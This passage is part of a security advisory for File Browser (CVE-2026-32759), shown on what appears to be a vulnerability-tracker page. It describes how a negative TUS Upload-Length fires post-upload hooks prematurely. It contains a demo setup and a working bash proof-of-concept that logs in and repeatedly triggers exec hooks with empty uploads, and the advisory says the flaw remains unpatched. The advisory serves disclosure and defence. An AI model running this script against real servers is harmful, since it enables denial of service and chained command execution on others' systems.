\"\", d.user)\n    // \u2190 after_upload hook fires with empty or partial file\n}\n```\n\n**The completion check uses signed comparison.** Any negative `uploadLength` is always less than `newOffset` (which starts at 0), so the hook fires on the very first PATCH regardless of how many bytes were sent.\n\n**Consequence:** An attacker with upload permission can:\n1. Initiate a TUS upload for any filename with `Upload-Length: -1`\n2. Send a PATCH with an empty body (`Upload-Offset: 0`)\n3. `after_upload` hook fires immediately with a 0-byte (or partial) file\n4. Repeat indefinitely - each POST+PATCH cycle re-fires the hook\n\nIf exec hooks are enabled and perform important operations on uploaded files (virus scanning, image processing, notifications, data pipeline ingestion), they will be triggered with attacker-controlled filenames and empty file contents.\n\n## Demo Server Setup\n\n```bash\ndocker run -d --name fb-tus \\\n  -p 8080:80 \\\n  -v /tmp/fb-tus:/srv \\\n  -e FB_EXECER=true \\\n  filebrowser/filebrowser:v2.31.2\n\nADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"admin\",\"password\":\"admin\"}\u0027)\n\n# Configure a visible after_upload hook\ncurl -s -X PUT http://localhost:8080/api/settings \\\n  -H \"X-Auth: $ADMIN_TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"commands\": {\n      \"after_upload\": [\"bash -c \\\"echo HOOK_FIRED: $FILE $(date) \u003e\u003e /tmp/hook_log.txt\\\"\"]\n    }\n  }\u0027\n```\n\n## PoC Exploit\n\n```bash\n#!/bin/bash\n# poc_tus_negative_length.sh\n\nTARGET=\"http://localhost:8080\"\n\n# Login as any user with upload permission\nTOKEN=$(curl -s -X POST \"$TARGET/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\":\"attacker\",\"password\":\"Attack3r!pass\"}\u0027)\n\necho \"[*] Token: ${TOKEN:0:40}...\"\n\nFILENAME=\"/trigger_test_$(date +%s).txt\"\n\necho \"[*] Step 1: POST TUS upload with Upload-Length: -1\"\ncurl -s -X POST \"$TARGET/api/tus$FILENAME\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Upload-Length: -1\" \\\n  -H \"Content-Length: 0\" \\\n  -v 2\u003e\u00261 | grep -E \"HTTP|Location\"\n\necho \"\"\necho \"[*] Step 2: PATCH with empty body (uploadOffset=0 \u003e= uploadLength=-1 \u2192 hook fires)\"\ncurl -s -X PATCH \"$TARGET/api/tus$FILENAME\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Upload-Offset: 0\" \\\n  -H \"Content-Type: application/offset+octet-stream\" \\\n  -H \"Content-Length: 0\" \\\n  -v 2\u003e\u00261 | grep -E \"HTTP|Upload\"\n\necho \"\"\necho \"[*] Checking hook log on server (/tmp/hook_log.txt)...\"\necho \"[*] If hook fired, you will see entries like:\"\necho \"    HOOK_FIRED: /srv/trigger_test_XXXX.txt \u003ctimestamp\u003e\"\n\necho \"\"\necho \"[*] Repeating 5 times to demonstrate unlimited hook triggering...\"\nfor i in $(seq 1 5); do\n  FNAME=\"/spam_hook_$i.txt\"\n  curl -s -X POST \"$TARGET/api/tus$FNAME\" \\\n    -H \"X-Auth: $TOKEN\" \\\n    -H \"Upload-Length: -1\" \\\n    -H \"Content-Length: 0\" \u003e /dev/null\n  \n  curl -s -X PATCH \"$TARGET/api/tus$FNAME\" \\\n    -H \"X-Auth: $TOKEN\" \\\n    -H \"Upload-Offset: 0\" \\\n    -H \"Content-Type: application/offset+octet-stream\" \\\n    -H \"Content-Length: 0\" \u003e /dev/null\n  \n  echo \"  Hook trigger $i sent\"\ndone\necho \"[*] Done - 5 hooks fired with 0 bytes uploaded.\"\n```\n\n## Impact\n\n**Exec Hook Abuse (when `enableExec = true`):** An attacker can trigger any `after_upload` exec hook an unlimited number of times with attacker-controlled filenames and empty file contents. Depending on the hook\u0027s purpose, this enables:\n\n- **Denial of Service:** Triggering expensive processing hooks (virus scanning, transcoding,\n  ML inference) with zero cost on the attacker\u0027s side.\n- **Command Injection amplification:** Combined with the hook injection vulnerability\n  (malicious filename + shell-wrapped hook), each trigger becomes a separate RCE.\n- **Business logic abuse:** Triggering upload-driven workflows (S3 ingestion, database inserts,\n  notifications) with empty payloads or arbitrary filenames.\n\n**Hook-free impact:** Even without exec hooks, a negative `Upload-Length` creates an inconsistent cache entry. The file is marked \"complete\" in the upload cache immediately, but the underlying file may be 0 bytes. Any subsequent read expecting a complete file will receive an empty file.\n\n**Who is affected:** All deployments using the TUS upload endpoint (`/api/tus`). The `enableExec` flag amplifies the impact from cache inconsistency to remote command execution.\n\n## Resolution\n\nThis vulnerability has not been addressed, and has been added to the issue tracking all security vulnerabilities regarding the command execution (https://github.com/filebrowser/filebrowser/issues/5199). Command execution is **disabled by default for all installations** and users are warned if they enable it. This feature is **not to be used in untrusted environments** and we recommend to **not use it**.",
  "id": "GHSA-ffx7-75gc-jg7c",
  "modified": "2026-03-30T13:59:48Z",
  "published": "2026-03-16T20:43:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32759"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/issues/5199"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32759 (GCVE-0-2026-32759)

FKIE_CVE-2026-32759

GHSA-FFX7-75GC-JG7C

Summary

Details

Demo Server Setup

PoC Exploit

Impact

Resolution

Tags

Sightings

Nomenclature